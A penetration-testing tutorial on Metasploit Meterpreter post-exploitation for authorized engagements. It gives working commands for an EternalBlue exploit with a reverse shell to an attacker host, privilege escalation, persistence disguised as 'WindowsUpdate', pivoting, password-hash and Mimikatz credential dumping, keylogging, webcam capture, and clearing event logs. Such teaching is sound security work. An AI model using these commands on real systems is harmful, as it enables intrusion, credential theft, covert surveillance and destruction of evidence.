Getting a shell is only the beginning. Post-exploitation — what you do after initial access — is where penetration testing proves its real value. It’s in this phase that you demonstrate actual business risk: access to credentials, sensitive data, lateral movement possibilities, and persistence. Metasploit’s Meterpreter is the most feature-rich post-exploitation agent available, offering an in-memory payload that leaves minimal disk artifacts while providing powerful capabilities.
Getting a Meterpreter Session
Meterpreter sessions are established through Metasploit exploit modules that use a Meterpreter payload. A typical setup:
msfconsole
# Use an exploit (example: EternalBlue)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
run
If successful, you drop into a Meterpreter prompt:
meterpreter >
Core Meterpreter Commands
sysinfo # OS version, hostname, architecture
getuid # Current user context
getpid # Process ID of the Meterpreter agent
ps # List all running processes
File System
pwd # Print working directory
ls # List directory contents
cd C:\\Users # Change directory
download secrets.txt /tmp/ # Download file from target
upload tool.exe C:\\Temp\\ # Upload file to target
search -f *.txt -d C:\\ # Search for files
cat file.txt # Read file contents
Networking
ipconfig # Network interfaces and IPs
arp # ARP cache (reveals other hosts)
route # Routing table
portfwd add -l 8080 -p 80 -r 10.10.10.5 # Port forward
Privilege Escalation
Once you have a low-privilege session, the goal is typically to gain SYSTEM or root.
Windows: getsystem
getsystem
This command tries multiple techniques in sequence: named pipe impersonation, token impersonation, and service creation. If it succeeds, getuid returns NT AUTHORITY\SYSTEM.
Windows: Local Exploit Suggester
run post/multi/recon/local_exploit_suggester
This module analyzes the target’s OS version and patch level, then recommends local privilege escalation exploits from the Metasploit library. Filter by rank (Excellent or Great) and try them sequentially.
Token Impersonation with Incognito
load incognito
list_tokens -u # List available tokens
impersonate_token "DOMAIN\\Administrator"
If a domain administrator has authenticated to the machine recently, their token may still be in memory. Incognito lets you impersonate it without knowing their password.
Linux: Sudo Enumeration
shell
sudo -l
If the compromised user can run commands as root via sudo — especially with NOPASSWD — escalation is trivial.
Persistence
Persistence mechanisms ensure continued access if the target reboots or the connection drops.
Windows Registry Run Key
run post/windows/manage/persistence_exe \
STARTUP=REGISTRY \
SESSION=1 \
PAYLOAD=windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 \
LPORT=4444
This drops a payload to disk and adds it to HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
Scheduled Task
run post/windows/manage/scheduledtask \
TASK_NAME="WindowsUpdate" \
COMMAND="C:\\Windows\\Temp\\payload.exe" \
TRIGGER=LOGON
SSH Key (Linux)
shell
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
Add your public key to the target’s authorized_keys for persistent SSH access.
Pivoting
Pivoting lets you route traffic through a compromised host to reach otherwise inaccessible network segments.
Adding a Route Through Meterpreter
# In meterpreter session
run post/multi/manage/autoroute SUBNET=10.10.10.0 NETMASK=255.255.255.0
# Back in msfconsole
route print
Now scans and exploits run from Metasploit will route through the compromised host into the internal network.
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j
Configure /etc/proxychains4.conf to use socks5 127.0.0.1 1080, then:
proxychains nmap -sT 10.10.10.0/24
proxychains curl http://10.10.10.5/admin/
Credential Harvesting
Hashdump
hashdump
Dumps local Windows account hashes from the SAM database. Requires SYSTEM privileges. Output format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Pass the NTLM hash (last field) directly to pass-the-hash attacks or crack offline with Hashcat:
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
Mimikatz via Kiwi
load kiwi
creds_all # Dump all available credentials
lsa_dump_sam # SAM database hashes
lsa_dump_secrets # LSA secrets (service accounts, cached creds)
Kiwi is the Meterpreter port of Mimikatz. It can extract plaintext passwords from LSASS memory on older Windows versions.
Keylogging
keyscan_start # Begin capturing keystrokes
# Wait for the user to type
keyscan_dump # Display captured keystrokes
keyscan_stop # Stop logging
Keylogging captures typed credentials, messages, and commands in real time. Migrate into Explorer.exe first for better coverage:
migrate -N explorer.exe
keyscan_start
Screenshot and Webcam
screenshot # Capture current desktop
webcam_list # List webcam devices
webcam_snap # Take a snapshot from webcam
run post/multi/gather/screen_spy INTERVAL=5 # Continuous screenshots
Session Management
# Background the session
background
# List all sessions
sessions -l
# Interact with a specific session
sessions -i 2
# Upgrade a basic shell to Meterpreter
sessions -u 1
Cleaning Up Traces
After a real authorized engagement, demonstrate cleanup:
clearev # Clear Windows event logs (Application, System, Security)
timestomp file.exe -m "01/01/2020 12:00:00" # Modify file timestamps
Post-exploitation in Metasploit gives you a structured, repeatable way to demonstrate the full impact of initial access — from a single foothold to domain-wide credential theft. Document every step for your report.